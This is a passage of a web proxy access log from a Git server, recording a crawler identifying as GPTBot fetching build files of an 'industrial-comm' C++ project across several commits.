3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10223] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9985] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11085] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11085] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10395] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9962] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10276] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12880] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11863] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11063] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70935] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44563] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11087] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:15:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17014] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11056] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12918] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10948] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39447] [Gzip 31.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39470] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 